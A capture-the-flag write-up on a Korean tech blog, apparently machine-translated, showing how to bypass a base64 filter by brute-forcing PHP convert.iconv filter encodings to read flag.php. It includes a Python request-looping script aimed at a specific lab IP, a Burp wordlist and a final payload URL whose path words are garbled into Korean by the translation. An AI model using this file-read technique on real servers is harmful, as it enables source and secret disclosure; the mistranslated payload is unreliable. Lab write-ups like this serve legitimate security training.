기술나눔

공격 및 방어 세계(PHP 필터 필터링)

2024-07-12

한어Русский языкEnglishFrançaisIndonesianSanskrit日本語DeutschPortuguêsΕλληνικάespañolItalianoSuomalainenLatina

변환 필터 공식 문서: https://www.php.net/manual/zh/filters.convert.php#filters.convert.iconv

이 질문은 Convert.base64-encode로 인해 필터링되었으므로 Convert.iconv.* 필터가 사용되었습니다.

활성화 아이콘브 전제하에 Convert.iconv.* 압축 필터를 사용할 수 있습니다. 이는 다음을 사용하는 것과 동일합니다.아이콘v() 모든 스트리밍 데이터를 처리합니다. 이 필터는 매개변수를 지원하지 않지만 입출력 인코딩 이름을 사용하여 Convert.iconv와 같은 필터 이름을 구성할 수 있습니다.<input-encoding> .<output-encoding> 또는 Convert.iconv.<input-encoding> /<output-encoding> (두 작성 방법의 의미는 동일합니다.)

스크립트를 직접 사용하여 적절한 인코딩을 실행하세요.

  1. import requests
  2.  
  3. in_encodings = ['UCS-4*', 'UCS-4BE', 'UCS-4LE*', 'UCS-2', 'UCS-2BE', 'UCS-2LE', 'UTF-32*', 'UTF-32BE*', 'UTF-32LE*', 'UTF-16*', 'UTF-16BE*', 'UTF-16LE*', 'UTF-7', 'UTF7-IMAP', 'UTF-8*', 'ASCII*', 'EUC-JP*', 'SJIS*', 'eucJP-win*', 'SJIS-win*', 'ISO-2022-JP', 'ISO-2022-JP-MS', 'CP932', 'CP51932', 'SJIS-mac', 'SJIS-Mobile#DOCOMO', 'SJIS-Mobile#KDDI', 'SJIS-Mobile#SOFTBANK', 'UTF-8-Mobile#DOCOMO', 'UTF-8-Mobile#KDDI-A', 'UTF-8-Mobile#KDDI-B', 'UTF-8-Mobile#SOFTBANK', 'ISO-2022-JP-MOBILE#KDDI', 'JIS', 'JIS-ms', 'CP50220', 'CP50220raw', 'CP50221', 'CP50222', 'ISO-8859-1*', 'ISO-8859-2*', 'ISO-8859-3*', 'ISO-8859-4*', 'ISO-8859-5*', 'ISO-8859-6*', 'ISO-8859-7*', 'ISO-8859-8*', 'ISO-8859-9*', 'ISO-8859-10*', 'ISO-8859-13*', 'ISO-8859-14*', 'ISO-8859-15*', 'ISO-8859-16*', 'byte2be', 'byte2le', 'byte4be', 'byte4le', 'BASE64', 'HTML-ENTITIES', '7bit', '8bit', 'EUC-CN*', 'CP936', 'GB18030', 'HZ', 'EUC-TW*', 'CP950', 'BIG-5*', "CP{949}", "CP{775}"]
  4.  
  5. out_codings = in_encodings[:]
  6. for inenc in in_encodings:
  7.     for outenc in out_codings:
  8.         url = 'http://61.147.171.105:62135/?filename=php://filter/convert.iconv.{}.{}/resource=flag.php'.format(inenc,outenc)
  9.         res = requests.get(url)
  10.         if "flag" in res.text:
  11.             print("inenc is:{},outenc is:{}".format(inenc,outenc))
  12.             print(res.text)

트림 발파에 이 사전을 사용하세요

  1. UCS-4*
  2. UCS-4BE
  3. UCS-4LE*
  4. UCS-2
  5. UCS-2BE
  6. UCS-2LE
  7. UTF-32*
  8. UTF-32BE*
  9. UTF-32LE*
  10. UTF-16*
  11. UTF-16BE*
  12. UTF-16LE*
  13. UTF-7
  14. UTF7-IMAP
  15. UTF-8*
  16. ASCII*
  17. EUC-JP*
  18. SJIS*
  19. eucJP-win*
  20. SJIS-win*
  21. ISO-2022-JP
  22. ISO-2022-JP-MS
  23. CP932
  24. CP51932
  25. SJIS-mac
  26. SJIS-Mobile#DOCOMO
  27. SJIS-Mobile#KDDI
  28. SJIS-Mobile#SOFTBANK
  29. UTF-8-Mobile#DOCOMO
  30. UTF-8-Mobile#KDDI-A
  31. UTF-8-Mobile#KDDI-B
  32. UTF-8-Mobile#SOFTBANK
  33. ISO-2022-JP-MOBILE#KDDI
  34. JIS
  35. JIS-ms
  36. CP50220
  37. CP50220raw
  38. CP50221
  39. CP50222
  40. ISO-8859-1*
  41. ISO-8859-2*
  42. ISO-8859-3*
  43. ISO-8859-4*
  44. ISO-8859-5*
  45. ISO-8859-6*
  46. ISO-8859-7*
  47. ISO-8859-8*
  48. ISO-8859-9*
  49. ISO-8859-10*
  50. ISO-8859-13*
  51. ISO-8859-14*
  52. ISO-8859-15*
  53. ISO-8859-16*
  54. byte2be
  55. byte2le
  56. byte4be
  57. byte4le
  58. BASE64
  59. HTML-ENTITIES
  60. 7bit
  61. 8bit
  62. EUC-CN*
  63. CP936
  64. GB18030
  65. HZ
  66. EUC-TW*
  67. CP950
  68. BIG-5*
  69. EUC-KR*
  70. UHC
  71. ISO-2022-KR
  72. Windows-1251
  73. Windows-1252
  74. CP866
  75. KOI8-R*
  76. KOI8-U*
  77. ArmSCII-8

클러스터 폭탄 모드를 선택하세요. 아직 폭발이 완료되지 않았으며 사용할 준비가 되었습니다.

dirsearch가 flag.php를 스캔했습니다. 플래그가 그 안에 있어야 합니다.

페이로드 구성:

http://61.147.171.105:62135?파일명=php://필터/변환.아이콘.UTF-8*.UTF-32*/리소스=플래그.php

개인 프로필

그는 30년 이상 기술 연구에 전념해 왔으며, java, linux, javascript, php, css 등 다양한 언어에 능숙하며, 오픈 소스 분야에 많은 공헌을 했습니다. 나중에 참조할 수 있도록 기술 개발의 일부 문제를 공유하는 개발자 문서 스테이션입니다.

내 연락처 정보

우편